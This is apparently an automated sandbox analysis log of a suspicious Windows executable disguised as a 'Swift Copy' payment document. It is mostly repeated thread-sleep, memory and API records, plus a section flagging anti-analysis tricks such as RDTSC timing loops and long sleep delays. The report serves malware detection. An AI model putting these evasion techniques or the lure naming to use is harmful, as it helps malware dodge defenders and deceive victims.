            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeAPI/Special instruction interceptor: Address: 503A079
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeAPI/Special instruction interceptor: Address: 37EA079
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeRDTSC instruction interceptor: First address: 501534D second address: 501534D instructions: 0x00000000 rdtsc 0x00000002 cmp edx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F590D2A9850h 0x00000008 inc ebp 0x00000009 test esi, 71E5EA69h 0x0000000f inc ebx 0x00000010 test eax, edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeRDTSC instruction interceptor: First address: 37C534D second address: 37C534D instructions: 0x00000000 rdtsc 0x00000002 cmp edx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F590CEB5510h 0x00000008 inc ebp 0x00000009 test esi, 71E5EA69h 0x0000000f inc ebx 0x00000010 test eax, edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeMemory allocated: 5560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeMemory allocated: 35DA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeMemory allocated: 35A50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598467Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597811Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597483Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596827Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596400Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596006Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595671Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594140Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeWindow / User API: threadDelayed 1239Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeWindow / User API: threadDelayed 8609Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp2DFD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 4628Thread sleep count: 1239 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 4628Thread sleep count: 8609 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598577s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598467s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597811s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597483s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596827s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596400s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -596006s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772Thread sleep time: -594140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_00402706 FindFirstFileW,6_2_00402706
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405731
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_004061E5 FindFirstFileW,FindClose,6_2_004061E5
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598467Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597811Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597483Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596827Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596400Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 596006Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595671Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeThread delayed: delay time: 594687Jump to behavior
